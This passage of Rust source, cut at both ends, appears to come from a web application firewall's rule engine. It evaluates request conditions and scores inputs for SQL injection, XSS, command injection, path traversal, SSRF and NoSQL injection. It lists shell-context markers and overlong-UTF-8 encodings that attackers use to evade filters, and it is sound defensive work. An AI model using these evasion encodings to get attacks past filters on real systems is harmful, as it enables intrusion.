.unwrap_or(false),
"compare" => eval_compare(condition, value),
"count_odd" => eval_count_odd(condition.match_value.as_ref(), value),
// Scoring analyzers; see the eval_*_analyzer helpers below.
"sql_analyzer" => self.eval_sql_analyzer(condition, value, ctx, trace, rule_id, depth),
"xss_analyzer" => self.eval_xss_analyzer(condition, value, ctx, trace, rule_id, depth),
"cmd_analyzer" => self.eval_cmd_analyzer(condition, value, ctx, trace, rule_id, depth),
"path_traversal_analyzer" => {
self.eval_path_traversal_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"ssrf_analyzer" => {
self.eval_ssrf_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"nosql_analyzer" => {
self.eval_nosql_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"hashset" => eval_hashset(condition.match_value.as_ref(), value),
"parse_multipart" => self.eval_parse_multipart(condition, ctx, trace, rule_id, depth),
// Stateful, per-IP tracking conditions.
"track_by_ip" => self.eval_track_by_ip(condition, ctx, trace, rule_id, depth),
"extract_argument" => self.eval_extract_argument(condition, ctx, trace, rule_id, depth),
"unique_count" => {
self.eval_unique_count(condition, ctx, value, &[], trace, rule_id, depth)
}
"count" => self.eval_count(condition, ctx, trace, rule_id, depth),
// Pass-through wrapper; the match result itself is the effect here.
"remember_match" => condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| self.eval_condition(child, ctx, value, trace, rule_id, depth + 1))
.unwrap_or(false),
// Unknown kinds fail closed.
_ => false,
};
if trace.is_enabled() {
trace.emit(TraceEvent::ConditionEvaluated {
rule_id,
kind: condition.kind.clone(),
field: condition.field.clone(),
op: condition.op.clone(),
name: condition.name.clone(),
matched,
});
}
matched
}
/// Logical combinator over child conditions. `op` is "and" (default),
/// "or", or "not"; the operands come from `match_value` as either an array
/// of conditions or a single condition.
///
/// Vacuous-truth semantics: a missing `match_value`, a non-array/non-cond
/// value, or ("and"/"not") an array with no valid condition items all
/// evaluate to true; an "or" with no valid operands is also true
/// (`!saw_operand`). Array items that are not conditions are skipped.
fn eval_boolean(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let op = condition.op.as_deref().unwrap_or("and");
let Some(match_value) = condition.match_value.as_ref() else {
return true;
};
match op {
"and" => {
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
if !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return false;
}
}
true
} else if let Some(child) = match_value.as_cond() {
self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
"or" => {
let mut saw_operand = false;
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
saw_operand = true;
if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return true;
}
}
!saw_operand
} else if let Some(child) = match_value.as_cond() {
self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
// Array form is a NOR: true only if no child matches.
"not" => {
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return false;
}
}
true
} else if let Some(child) = match_value.as_cond() {
!self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
// Unknown operators fail closed.
_ => false,
}
}
/// Matches the request method against a single string, a list of strings,
/// or a nested condition that receives the method as its input value.
/// String comparisons are case-insensitive.
fn eval_method(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let method = ctx.method;
    let Some(mv) = condition.match_value.as_ref() else {
        return false;
    };
    if let Some(s) = mv.as_str() {
        method.eq_ignore_ascii_case(s)
    } else if let Some(arr) = mv.as_arr() {
        arr.iter()
            .filter_map(|item| item.as_str())
            .any(|s| method.eq_ignore_ascii_case(s))
    } else if let Some(child) = mv.as_cond() {
        self.eval_condition(child, ctx, Some(method), trace, rule_id, depth + 1)
    } else {
        false
    }
}
/// Matches the request URI: a string match value is a substring test, a
/// nested condition receives the URI as its input value.
fn eval_uri(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let Some(mv) = condition.match_value.as_ref() else {
        return false;
    };
    if let Some(needle) = mv.as_str() {
        return ctx.url.contains(needle);
    }
    mv.as_cond()
        .map(|child| self.eval_condition(child, ctx, Some(ctx.url), trace, rule_id, depth + 1))
        .unwrap_or(false)
}
/// True if the child condition matches any request argument value.
fn eval_args(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let child = match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        Some(c) => c,
        None => return false,
    };
    ctx.args
        .iter()
        .any(|arg| self.eval_condition(child, ctx, Some(arg), trace, rule_id, depth + 1))
}
/// True if the child condition matches the value of any argument whose key
/// equals `condition.name` ("*", the default, matches every argument).
fn eval_named_argument(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
        return false;
    };
    let wanted = condition.name.as_deref().unwrap_or("*");
    ctx.arg_entries.iter().any(|entry| {
        (wanted == "*" || entry.key == wanted)
            && self.eval_condition(child, ctx, Some(&entry.value), trace, rule_id, depth + 1)
    })
}
/// Matches a request header. An explicit direction other than "c2s"
/// (client-to-server) never matches. A condition with no `match_value`
/// asserts mere presence of the header; otherwise the child condition
/// receives the header value (a non-condition `match_value` fails closed).
fn eval_header(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    if condition.direction.as_deref().map_or(false, |d| d != "c2s") {
        return false;
    }
    let header_value = match condition.field.as_deref() {
        Some(field) => get_header_value(&ctx.headers, field),
        None => return false,
    };
    let Some(header_value) = header_value else {
        return false;
    };
    match condition.match_value.as_ref() {
        None => true,
        Some(mv) => mv
            .as_cond()
            .map(|child| {
                self.eval_condition(child, ctx, Some(header_value), trace, rule_id, depth + 1)
            })
            .unwrap_or(false),
    }
}
/// Runs a precompiled regex against the value. Only patterns compiled into
/// the cache at rule-load time can match; an unknown pattern fails closed.
fn eval_regex(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    match (value, match_value.and_then(|m| m.as_str())) {
        (Some(v), Some(pattern)) => self
            .regex_cache
            .get(pattern)
            .map_or(false, |re| re.is_match(v)),
        _ => false,
    }
}
/// Case-insensitive whole-word match. Uses the precompiled word cache when
/// possible; words not seen at load time are compiled ad hoc on every call
/// (the cache cannot be updated through `&self`), failing closed if the
/// pattern does not build.
fn eval_word(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    let (Some(value), Some(word)) = (value, match_value.and_then(|m| m.as_str())) else {
        return false;
    };
    if let Some(re) = self.word_regex_cache.get(word) {
        return re.is_match(value);
    }
    let pattern = format!(r"(?i)\b{}\b", regex::escape(word));
    RegexBuilder::new(&pattern)
        .multi_line(true)
        .build()
        .map(|re| re.is_match(value))
        .unwrap_or(false)
}
/// Scores the value with the SQL-injection heuristics. A child condition
/// (if present) receives the numeric score as a string; otherwise any
/// positive score counts as a match.
fn eval_sql_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => sql_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Scores the value with the XSS heuristics. A child condition (if
/// present) receives the numeric score as a string; otherwise any positive
/// score counts as a match.
fn eval_xss_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => xss_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Scores the value with the command-injection heuristics. A child
/// condition (if present) receives the numeric score as a string;
/// otherwise any positive score counts as a match.
fn eval_cmd_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => cmd_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Scores the value with the path-traversal heuristics. A child condition
/// (if present) receives the numeric score as a string; otherwise any
/// positive score counts as a match.
fn eval_path_traversal_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => path_traversal_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Scores the value with the SSRF heuristics. A child condition (if
/// present) receives the numeric score as a string; otherwise any positive
/// score counts as a match.
fn eval_ssrf_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => ssrf_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Scores the value with the NoSQL-injection heuristics. A child condition
/// (if present) receives the numeric score as a string; otherwise any
/// positive score counts as a match.
fn eval_nosql_analyzer(
    &self,
    condition: &MatchCondition,
    value: Option<&str>,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    let score = match value {
        Some(v) => nosql_analyzer_score(v),
        None => return false,
    };
    if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        let score_text = score.to_string();
        self.eval_condition(child, ctx, Some(&score_text), trace, rule_id, depth + 1)
    } else {
        score > 0
    }
}
/// Parses a multipart body (boundary taken from the Content-Type header)
/// and matches the child condition against each part value; true if any
/// part matches. Prefers the decoded text body over raw bytes when both
/// are available.
fn eval_parse_multipart(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
let raw_bytes: &[u8] = if let Some(body_text) = ctx.body_text {
body_text.as_bytes()
} else if let Some(raw) = ctx.raw_body {
raw
} else {
return false;
};
// Header keys are lowercase here -- presumably normalized when the
// context is built; confirm against EvalContext::from_request.
let content_type = ctx.headers.get("content-type").copied().unwrap_or("");
let Some(boundary) = extract_multipart_boundary(content_type) else {
return false;
};
let values = parse_multipart_values(raw_bytes, &boundary);
for part_value in &values {
if self.eval_condition(child, ctx, Some(part_value), trace, rule_id, depth + 1) {
return true;
}
}
false
}
/// Entry point for per-IP stateful tracking: delegates the child condition
/// to the tracking pipeline with an initially empty value set. Fails
/// closed when no child condition is configured.
fn eval_track_by_ip(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        Some(child) => {
            self.process_track_condition(child, ctx, Vec::new(), trace, rule_id, depth + 1)
        }
        None => false,
    }
}
/// Extracts argument values via the condition's selector and, when a child
/// condition exists, feeds them into the tracking pipeline. With no child,
/// a non-empty extraction alone counts as a match; an empty extraction
/// always fails.
fn eval_extract_argument(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let selector = condition.selector.as_deref();
let extracted = select_argument_values(self, selector, ctx);
if extracted.is_empty() {
return false;
}
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => {
self.process_track_condition(child, ctx, extracted, trace, rule_id, depth + 1)
}
None => true,
}
}
/// Counts distinct values seen from this IP within `timeframe` seconds
/// (default 60). With values to record (explicit `values`, else the single
/// current `value`) the store records them and returns the updated count;
/// with none it only reads the current count.
///
/// Threshold resolution, in priority order: a child condition receiving
/// the count as a string; a numeric `match_value` (count >= n); the
/// condition's `count` field (count >= n); otherwise any nonzero count.
fn eval_unique_count(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
values: &[String],
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let timeframe = condition.timeframe.unwrap_or(60);
let trace_label = "unique_count";
let values_to_record: Vec<String> = if !values.is_empty() {
values.to_vec()
} else if let Some(v) = value {
vec![v.to_string()]
} else {
Vec::new()
};
// Scope the write lock to the store operation only.
let unique_count = {
let mut store = self.store.write();
if values_to_record.is_empty() {
store.get_unique_count(ctx.ip, trace_label, timeframe)
} else {
store.record_unique_values(ctx.ip, trace_label, &values_to_record, timeframe)
}
};
if let Some(mv) = condition.match_value.as_ref() {
if let Some(child) = mv.as_cond() {
return self.eval_condition(
child,
ctx,
Some(&unique_count.to_string()),
trace,
rule_id,
depth + 1,
);
}
if let Some(num) = mv.as_num() {
return unique_count as f64 >= num;
}
}
if let Some(count) = condition.count {
unique_count as u64 >= count
} else {
unique_count > 0
}
}
/// Evaluates a `count` condition: records one event for `ctx.ip` in the
/// sliding window and matches once the event count reaches the threshold
/// (`count`, default 1). A nested condition acts as a gate — non-matching
/// requests are not counted.
fn eval_count(
    &self,
    condition: &MatchCondition,
    ctx: &EvalContext,
    trace: &mut TraceState,
    rule_id: u32,
    depth: u32,
) -> bool {
    // Window length in seconds; defaults to one minute.
    let window_secs = condition.timeframe.unwrap_or(60);
    if let Some(gate) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
        if !self.eval_condition(gate, ctx, None, trace, rule_id, depth + 1) {
            return false;
        }
    }
    // The write guard is dropped at the end of this statement.
    let observed = self.store.write().record_event(ctx.ip, "count", window_secs);
    observed as u64 >= condition.count.unwrap_or(1)
}
/// Dispatches a condition appearing inside a tracking chain
/// (`track_by_ip` / `extract_argument`), threading the currently extracted
/// `values` through to counting leaves.
fn process_track_condition(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
values: Vec<String>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
match condition.kind.as_str() {
"extract_argument" => {
// Re-extract using this node's selector; an empty extraction fails
// the whole chain.
let selector = condition.selector.as_deref();
let extracted = select_argument_values(self, selector, ctx);
if extracted.is_empty() {
return false;
}
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.process_track_condition(
child,
ctx,
extracted,
trace,
rule_id,
depth + 1,
),
None => {
// Leaf extraction: record the values (fixed 60 s window,
// "extract" label) and treat the node as matched.
// NOTE(review): differs from eval_extract_argument's leaf,
// which matches without recording — confirm this is intended.
let mut store = self.store.write();
store.record_unique_values(ctx.ip, "extract", &extracted, 60);
true
}
}
}
"unique_count" => {
self.eval_unique_count(condition, ctx, None, &values, trace, rule_id, depth + 1)
}
"count" => self.eval_count(condition, ctx, trace, rule_id, depth + 1),
_ => {
// Any other kind is evaluated normally, with the first extracted
// value (if any) as the candidate.
let candidate = values.first().map(|s| s.as_str());
self.eval_condition(condition, ctx, candidate, trace, rule_id, depth + 1)
}
}
}
}
/// Builds the bitmask of request features present in `ctx` (args, per-entry
/// args, body, JSON body), used to pre-filter candidate rules.
fn compute_available_features(ctx: &EvalContext) -> u16 {
    let checks = [
        (!ctx.args.is_empty(), REQ_ARGS),
        (!ctx.arg_entries.is_empty(), REQ_ARG_ENTRIES),
        (ctx.body_text.is_some() || ctx.raw_body.is_some(), REQ_BODY),
        (ctx.json_text.is_some(), REQ_JSON),
    ];
    checks
        .iter()
        .fold(0u16, |acc, &(present, flag)| if present { acc | flag } else { acc })
}
/// Builds the per-request header bitmask: bit `i` is set when the request
/// carries the header the index assigned to bit `i`. Only the first 64
/// indexed headers fit in the u64 mask.
fn compute_request_header_mask(index: &RuleIndex, headers: &HashMap<String, &str>) -> u64 {
    let mut mask = 0u64;
    for (bit, name) in index.header_bits.iter().enumerate().take(64) {
        if headers.contains_key(name) {
            mask |= 1u64 << bit;
        }
    }
    mask
}
fn get_header_value<'a>(headers: &'a HashMap<String, &'a str>, field: &str) -> Option<&'a str> {
let key = field.to_ascii_lowercase();
headers
.get(&key)
.copied()
.or_else(|| headers.get(field).copied())
}
/// `contains` predicate: true when both a candidate value and a string match
/// value exist and the candidate contains that substring.
fn eval_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    match (value, match_value.and_then(|m| m.as_str())) {
        (Some(haystack), Some(needle)) => haystack.contains(needle),
        _ => false,
    }
}
/// `starts_with` predicate: true when both a candidate value and a string
/// match value exist and the candidate begins with that prefix.
fn eval_starts_with(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    match (value, match_value.and_then(|m| m.as_str())) {
        (Some(candidate), Some(prefix)) => candidate.starts_with(prefix),
        _ => false,
    }
}
/// `equals` predicate: true when both a candidate value and a string match
/// value exist and they are exactly (case-sensitively) equal.
fn eval_equals(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    match (value, match_value.and_then(|m| m.as_str())) {
        (Some(candidate), Some(expected)) => candidate == expected,
        _ => false,
    }
}
/// `multiple_contains` predicate: true when the candidate contains at least
/// one of the string entries in the match-value array. Non-string array
/// entries are ignored.
fn eval_multiple_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    let (Some(haystack), Some(needles)) = (value, match_value.and_then(|m| m.as_arr())) else {
        return false;
    };
    needles
        .iter()
        .filter_map(|item| item.as_str())
        .any(|needle| haystack.contains(needle))
}
/// `hashset` predicate: true when the candidate equals (ASCII
/// case-insensitively) any string entry in the match-value array.
/// Non-string array entries are ignored.
fn eval_hashset(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    let (Some(candidate), Some(set)) = (value, match_value.and_then(|m| m.as_arr())) else {
        return false;
    };
    set.iter()
        .filter_map(|item| item.as_str())
        .any(|entry| entry.eq_ignore_ascii_case(candidate))
}
/// Numeric comparison predicate: parses the candidate as f64 and compares it
/// against the numeric match value with the condition's operator
/// (`gt`/`gte`/`lt`/`lte`/`eq`, default `eq`). Unparseable candidates,
/// missing numbers, and unknown operators never match.
fn eval_compare(condition: &MatchCondition, candidate: Option<&str>) -> bool {
    let Some(lhs) = candidate.and_then(|c| c.parse::<f64>().ok()) else {
        return false;
    };
    let Some(rhs) = condition.match_value.as_ref().and_then(|m| m.as_num()) else {
        return false;
    };
    // NOTE(review): "eq" is an exact f64 comparison; presumably fine for
    // integer counters, but lossy for arbitrary decimals — confirm.
    match condition.op.as_deref().unwrap_or("eq") {
        "gt" => lhs > rhs,
        "gte" => lhs >= rhs,
        "lt" => lhs < rhs,
        "lte" => lhs <= rhs,
        "eq" => lhs == rhs,
        _ => false,
    }
}
/// `count_odd` predicate: true when the candidate contains an odd number of
/// non-overlapping occurrences of the (non-empty) needle — e.g. an unbalanced
/// quote count.
fn eval_count_odd(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
    match (value, match_value.and_then(|m| m.as_str())) {
        (Some(haystack), Some(needle)) if !needle.is_empty() => {
            haystack.matches(needle).count() % 2 != 0
        }
        _ => false,
    }
}
/// SQL-injection heuristic: returns 1 when any of the precompiled SQL
/// signature regexes (keywords, phrases, tautologies, comment markers,
/// shutdown) matches `value`, otherwise 0.
fn sql_analyzer_score(value: &str) -> u32 {
    let detectors = [
        &SQL_KEYWORDS,
        &SQL_PHRASES,
        &SQL_OR_AND_EQ,
        &SQL_COMMENT_1,
        &SQL_COMMENT_2,
        &SQL_SHUTDOWN,
    ];
    u32::from(detectors.iter().any(|re| re.is_match(value)))
}
/// Command-injection heuristic: checks the raw value, then one and (when a
/// '%' survives the first pass) two levels of percent-decoding to catch
/// single- and double-encoded payloads. Returns 1 on any hit, else 0.
fn cmd_analyzer_score(value: &str) -> u32 {
    if check_cmd_patterns(value) {
        return 1;
    }
    let once = safe_percent_decode(value);
    if once != value && check_cmd_patterns(&once) {
        return 1;
    }
    // Only attempt a second decode if encoding residue remains.
    if !once.contains('%') {
        return 0;
    }
    let twice = safe_percent_decode(&once);
    u32::from(twice != once && check_cmd_patterns(&twice))
}
#[inline]
/// True when `value` matches a command-injection signature. Some patterns
/// (chaining, redirection, path traversal) are too noisy on their own and
/// only count when shell context is also present.
fn check_cmd_patterns(value: &str) -> bool {
    let unconditional = [
        &CMD_BACKTICK,
        &CMD_SUBSHELL,
        &CMD_DANGEROUS,
        &CMD_IFS,
        &CMD_VAR_SUBST,
        &CMD_NEWLINE_LITERAL,
        &CMD_NEWLINE_ENCODED,
        &CMD_NULL_BYTE,
        &CMD_BRACE,
    ];
    if unconditional.iter().any(|re| re.is_match(value)) {
        return true;
    }
    // (A && ctx) || (B && ctx) || (C && ctx)  ==  (A || B || C) && ctx
    let context_gated = [&CMD_CHAIN, &CMD_REDIRECT, &CMD_PATH_TRAVERSAL];
    context_gated.iter().any(|re| re.is_match(value)) && has_cmd_context(value)
}
#[inline]
/// True when `value` carries shell context: substitution syntax, a dangerous
/// command, or a well-known system path.
fn has_cmd_context(value: &str) -> bool {
    const SHELL_MARKERS: [&str; 8] = [
        "`", "$(", "${", "/bin/", "/usr/bin/", "/etc/", "/tmp/", "/dev/",
    ];
    SHELL_MARKERS.iter().any(|marker| value.contains(marker)) || CMD_DANGEROUS.is_match(value)
}
/// Path-traversal heuristic: checks the raw value, then up to three layers of
/// percent-decoding (each further layer only while a '%' remains), and
/// finally an overlong-UTF-8 normalization of the original value.
/// Returns 1 on any hit, else 0.
fn path_traversal_analyzer_score(value: &str) -> u32 {
    if check_path_traversal_patterns(value) {
        return 1;
    }
    let mut current = value.to_string();
    for layer in 0..3 {
        // Layers beyond the first require leftover percent-encoding.
        if layer > 0 && !current.contains('%') {
            break;
        }
        let decoded = safe_percent_decode(&current);
        if decoded != current && check_path_traversal_patterns(&decoded) {
            return 1;
        }
        current = decoded;
    }
    let normalized = normalize_unicode_path(value);
    u32::from(normalized != value && check_path_traversal_patterns(&normalized))
}
#[inline]
/// True when `value` matches a path-traversal signature directly, or when it
/// both hints at traversal and names a sensitive target file.
fn check_path_traversal_patterns(value: &str) -> bool {
    let direct = [
        &PATH_TRAV_BASIC,
        &PATH_TRAV_ENCODED,
        &PATH_TRAV_DOUBLE,
        &PATH_TRAV_UNICODE,
        &PATH_TRAV_BACKSLASH,
        &PATH_TRAV_NULL,
    ];
    direct.iter().any(|re| re.is_match(value))
        || (has_traversal_context(value) && check_sensitive_targets(value))
}
#[inline]
/// Cheap pre-filter: does `value` contain anything that could become a
/// traversal sequence once decoded — literal dots, percent-encoded dots
/// (`%2e`), or overlong-UTF-8 prefixes (`%c0`)?
fn has_traversal_context(value: &str) -> bool {
    let lowered = value.to_ascii_lowercase();
    lowered.contains("..") || lowered.contains("%2e") || lowered.contains("%c0")
}
#[inline]
/// True when `value` references a sensitive Unix or Windows target file.
fn check_sensitive_targets(value: &str) -> bool {
    [&PATH_TRAV_TARGETS_UNIX, &PATH_TRAV_TARGETS_WIN]
        .iter()
        .any(|re| re.is_match(value))
}
/// Normalizes overlong-UTF-8 percent-encodings (both cases) to their ASCII
/// path characters: '.' (e.g. `%c0%ae`), '/' (e.g. `%c0%af`), and '\\'
/// (e.g. `%c1%9c`), so traversal checks can run on the canonical form.
fn normalize_unicode_path(value: &str) -> String {
    const REPLACEMENTS: [(&str, &str); 14] = [
        ("%c0%ae", "."),
        ("%C0%AE", "."),
        ("%c0%2e", "."),
        ("%C0%2E", "."),
        ("%e0%80%ae", "."),
        ("%E0%80%AE", "."),
        ("%c0%af", "/"),
        ("%C0%AF", "/"),
        ("%e0%80%af", "/"),
        ("%E0%80%AF", "/"),
        ("%c1%9c", "\\"),
        ("%C1%9C", "\\"),
        ("%c1%1c", "\\"),
        ("%C1%1C", "\\"),
    ];
    REPLACEMENTS
        .iter()
        .fold(value.to_string(), |acc, &(from, to)| acc.replace(from, to))
}
/// SSRF heuristic: checks the raw value, then one and (when a '%' survives
/// the first pass) two levels of percent-decoding. Returns 1 on any hit,
/// else 0.
fn ssrf_analyzer_score(value: &str) -> u32 {
    if check_ssrf_patterns(value) {
        return 1;
    }
    let once = safe_percent_decode(value);
    if once != value && check_ssrf_patterns(&once) {
        return 1;
    }
    // Only attempt a second decode if encoding residue remains.
    if !once.contains('%') {
        return 0;
    }
    let twice = safe_percent_decode(&once);
    u32::from(twice != once && check_ssrf_patterns(&twice))
}
#[inline]
/// True when `value` matches any SSRF signature: dangerous URL schemes,
/// cloud metadata endpoints/hosts, loopback, mapped/private/link-local
/// addresses, or numerically encoded IPs.
fn check_ssrf_patterns(value: &str) -> bool {
    let detectors = [
        &SSRF_DANGEROUS_SCHEME,
        &SSRF_CLOUD_METADATA,
        &SSRF_METADATA_HOST,
        &SSRF_LOCALHOST_V4,
        &SSRF_LOCALHOST_V6,
        &SSRF_MAPPED_IPV6,
        &SSRF_PRIVATE_IP,
        &SSRF_LINK_LOCAL,
        &SSRF_ENCODED_IP,
    ];
    detectors.iter().any(|re| re.is_match(value))
}
/// NoSQL-injection heuristic: checks the raw value, then one and (when a '%'
/// survives the first pass) two levels of percent-decoding. Returns 1 on any
/// hit, else 0.
fn nosql_analyzer_score(value: &str) -> u32 {
    if check_nosql_patterns(value) {
        return 1;
    }
    let once = safe_percent_decode(value);
    if once != value && check_nosql_patterns(&once) {
        return 1;
    }
    // Only attempt a second decode if encoding residue remains.
    if !once.contains('%') {
        return 0;
    }
    let twice = safe_percent_decode(&once);
    u32::from(twice != once && check_nosql_patterns(&twice))
}
#[inline]
/// True when `value` matches any NoSQL-injection signature: `$where` JS,
/// auth-bypass operators, prototype pollution, Mongo operators/aggregation,
/// or CouchDB/Redis/Cassandra payloads.
fn check_nosql_patterns(value: &str) -> bool {
    let detectors = [
        &NOSQL_WHERE_JS,
        &NOSQL_AUTH_BYPASS,
        &JSON_PROTO_POLLUTION,
        &NOSQL_MONGO_OPERATORS,
        &NOSQL_AGGREGATION,
        &NOSQL_COUCHDB,
        &NOSQL_REDIS,
        &NOSQL_CASSANDRA,
    ];
    detectors.iter().any(|re| re.is_match(value))
}
/// XSS heuristic: checks the raw value, then one and (when an '&' survives
/// the first pass) two levels of HTML-entity decoding to catch single- and
/// double-entity-encoded payloads. Returns 1 on any hit, else 0.
fn xss_analyzer_score(value: &str) -> u32 {
    if check_xss_patterns(value) {
        return 1;
    }
    let once = decode_html_entities(value);
    if once != value && check_xss_patterns(&once) {
        return 1;
    }
    // Only attempt a second decode if entity residue remains.
    if !once.contains('&') {
        return 0;
    }
    let twice = decode_html_entities(&once);
    u32::from(twice != once && check_xss_patterns(&twice))
}
#[inline]
/// True when `value` matches any XSS signature: script tags, `javascript:`
/// URLs, `on*=` handlers, cookie access, or img-src payloads.
fn check_xss_patterns(value: &str) -> bool {
    let detectors = [
        &XSS_SCRIPT,
        &XSS_JS_SCHEME,
        &XSS_ON_ATTR,
        &XSS_COOKIE,
        &XSS_IMG_SRC,
    ];
    detectors.iter().any(|re| re.is_match(value))
}
/// Decodes HTML character entities (`&lt;`, `&#60;`, `&#x3C;`, …) in `value`.
///
/// Only entities terminated by ';' within 10 characters of the '&' are
/// decoded; anything unrecognized is emitted verbatim. Used to catch
/// entity-encoded XSS payloads before pattern matching.
fn decode_html_entities(value: &str) -> String {
// Fast path: no ampersand means no entities.
if !value.contains('&') {
return value.to_string();
}
let mut result = String::with_capacity(value.len());
let mut chars = value.chars().peekable();
while let Some(c) = chars.next() {
if c == '&' {
// Collect the entity body (ASCII alphanumerics and '#') until a
// ';', a non-entity character, or the 10-iteration cap.
let mut entity = String::new();
let mut found_semicolon = false;
for _ in 0..10 {
match chars.peek() {
Some(';') => {
chars.next();
found_semicolon = true;
break;
}
Some(&ch) if ch.is_ascii_alphanumeric() || ch == '#' => {
if let Some(next) = chars.next() {
entity.push(next);
} else {
break;
}
}
// Non-entity character (left unconsumed) or end of input.
_ => break,
}
}
if found_semicolon && !entity.is_empty() {
if let Some(decoded) = decode_single_entity(&entity) {
result.push(decoded);
continue;
}
}
// Not a recognized entity: re-emit the original text verbatim,
// including the ';' only if one was actually consumed.
result.push('&');
result.push_str(&entity);
if found_semicolon {
result.push(';');
}
} else {
result.push(c);
}
}
result
}
/// Decodes a single HTML entity body (the text between '&' and ';') into its
/// character. Handles numeric forms (`#60`, `#x3C`, `#X3C`) and a fixed table
/// of named entities; returns `None` for anything unrecognized, unparseable,
/// or outside the valid Unicode scalar range.
fn decode_single_entity(entity: &str) -> Option<char> {
    // Numeric entity: decimal `#NNN` or hexadecimal `#xNN` / `#XNN`.
    if let Some(body) = entity.strip_prefix('#') {
        let code = match body.strip_prefix(['x', 'X']) {
            Some(hex) => u32::from_str_radix(hex, 16).ok()?,
